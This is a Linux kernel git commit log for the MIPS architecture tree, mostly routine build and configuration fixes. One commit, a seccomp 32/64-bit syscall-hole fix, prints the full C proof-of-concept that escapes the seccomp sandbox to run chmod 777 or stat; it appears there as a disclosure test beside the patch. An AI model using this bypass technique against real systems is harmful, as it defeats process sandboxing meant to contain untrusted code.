linux.git/arch/mips, branch v2.6.29 Linux kernel source tree MIPS: Mark Eins: Fix configuration. 2009-03-13T22:08:00+00:00 Ralf Baechle ralf@linux-mips.org 2009-03-13T20:17:57+00:00 a83860c2da9303c864a53c299d17f608f9643541 Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: Fix TIF_32BIT undefined problem when seccomp is disabled 2009-03-13T22:07:59+00:00 Zhang Le r0bertz@gentoo.org 2009-03-12T10:00:50+00:00 3b289d6e35a1a535c19a5b079f0500526754e650 Signed-off-by: Zhang Le <r0bertz@gentoo.org> Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Signed-off-by: Zhang Le <r0bertz@gentoo.org>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: IP27: Enable RAID5 module 2009-03-11T20:11:07+00:00 Ralf Baechle ralf@linux-mips.org 2009-03-11T20:08:50+00:00 0a7c808fccc86418acf0e0b4b119094fb56af952 Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: TXx9: update defconfigs 2009-03-11T20:11:07+00:00 Atsushi Nemoto anemo@mba.ocn.ne.jp 2009-03-04T14:45:44+00:00 dc58f81346787c82ac47aef1be911ed9edf16024 Enable following features: * MTD (PHYSMAP) * LED (LEDS_GPIO) * RBTX4939 * 7SEGLED * IDE (IDE_TX4938, IDE_TX4939) * SMC91X * RTC_DRV_TX4939 Signed-off-by: Atsushi Nemoto <anemo@mba.ocn.ne.jp> Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Enable following features:
* MTD (PHYSMAP)
* LED (LEDS_GPIO)
* RBTX4939
* 7SEGLED
* IDE (IDE_TX4938, IDE_TX4939)
* SMC91X
* RTC_DRV_TX4939

Signed-off-by: Atsushi Nemoto <anemo@mba.ocn.ne.jp>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: NEC VR5500 processor support fixup 2009-03-11T20:11:07+00:00 Shinya Kuribayashi shinya.kuribayashi@necel.com 2009-03-03T09:05:51+00:00 a644b2774d41409519bb33a16bd577cb41bb3095 Current VR5500 processor support lacks of some functions which are expected to be configured/synthesized on arch initialization. Here're some VR5500A spec notes: * All execution hazards are handled in hardware. * Once VR5500A stops the operation of the pipeline by WAIT instruction, it could return from the standby mode only when either a reset, NMI request, or all enabled interrupts is/are detected. In other words, if interrupts are disabled by Status.IE=0, it keeps in standby mode even when interrupts are internally asserted. Notes on WAIT: The operation of the processor is undefined if WAIT insn is in the branch delay slot. The operation is also undefined if WAIT insn is executed when Status.EXL and Status.ERL are set to 1. * VR5500A core only implements the Load prefetch. With these changes, it boots fine. Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com> Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Current VR5500 processor support lacks of some functions which are
expected to be configured/synthesized on arch initialization.

Here're some VR5500A spec notes:

* All execution hazards are handled in hardware.

* Once VR5500A stops the operation of the pipeline by WAIT instruction,
  it could return from the standby mode only when either a reset, NMI
  request, or all enabled interrupts is/are detected.  In other words,
  if interrupts are disabled by Status.IE=0, it keeps in standby mode
  even when interrupts are internally asserted.

  Notes on WAIT: The operation of the processor is undefined if WAIT
  insn is in the branch delay slot.  The operation is also undefined
  if WAIT insn is executed when Status.EXL and Status.ERL are set to 1.

* VR5500A core only implements the Load prefetch.

With these changes, it boots fine.

Signed-off-by: Shinya Kuribayashi <shinya.kuribayashi@necel.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: Fix build of non-CONFIG_SYSVIPC version of sys_32_ipc 2009-03-11T20:11:07+00:00 Xiaotian Feng Xiaotian.Feng@windriver.com 2009-03-09T01:45:12+00:00 c189846ecf900cd6b3ad7d3cef5b45a746ce646b Signed-off-by: Xiaotian Feng <xiaotian.feng@windriver.com> Signed-off-by: Ralf Baechle <ralf@linux-mips.org> 
Signed-off-by: Xiaotian Feng <xiaotian.feng@windriver.com>
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
MIPS: compat: Implement is_compat_task. 2009-03-08T16:59:39+00:00 Ralf Baechle ralf@linux-mips.org 2009-03-05T10:45:48+00:00 4302e5d53b9166d45317e3ddf0a7a9dab3efd43b This is a build fix required after "x86-64: seccomp: fix 32/64 syscall hole" (commit 5b1017404aea6d2e552e991b3fd814d839e9cd67). MIPS doesn't have the issue that was fixed for x86-64 by that patch. This also doesn't solve the N32 issue which is that N32 seccomp processes will be treated as non-compat processes thus only have access to N64 syscalls. Signed-off-by: Ralf Baechle <ralf@linux-mips.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> 
This is a build fix required after "x86-64: seccomp: fix 32/64 syscall
hole" (commit 5b1017404aea6d2e552e991b3fd814d839e9cd67).  MIPS doesn't
have the issue that was fixed for x86-64 by that patch.

This also doesn't solve the N32 issue which is that N32 seccomp processes
will be treated as non-compat processes thus only have access to N64
syscalls.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
x86-64: seccomp: fix 32/64 syscall hole 2009-03-02T23:41:30+00:00 Roland McGrath roland@redhat.com 2009-02-28T07:25:54+00:00 5b1017404aea6d2e552e991b3fd814d839e9cd67 On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> 
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Revert "MIPS: Print irq handler description" 2009-02-27T17:56:35+00:00 Ralf Baechle ralf@linux-mips.org 2009-02-27T14:06:04+00:00 5312dc6bc0df9c5ffae543b6f62e4d0970ad2cc6 This reverts commit 558d1de8ba9ebb1cc3f3062f1371b9330772164f. 
This reverts commit 558d1de8ba9ebb1cc3f3062f1371b9330772164f.
MIPS: CVE-2009-0029: Enable syscall wrappers. 2009-02-27T17:56:35+00:00 Ralf Baechle ralf@linux-mips.org 2009-02-08T16:00:26+00:00 dbda6ac0897603f6c6dfadbbc37f9882177ec7ac Thanks to David Daney helping with debugging and testing. Signed-off-by: Ralf Baechle <ralf@linux-mips.org> Signed-off-by: David Daney <ddaney@caviumnetworks.com> 
Thanks to David Daney helping with debugging and testing.

Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: David Daney <ddaney@caviumnetworks.com>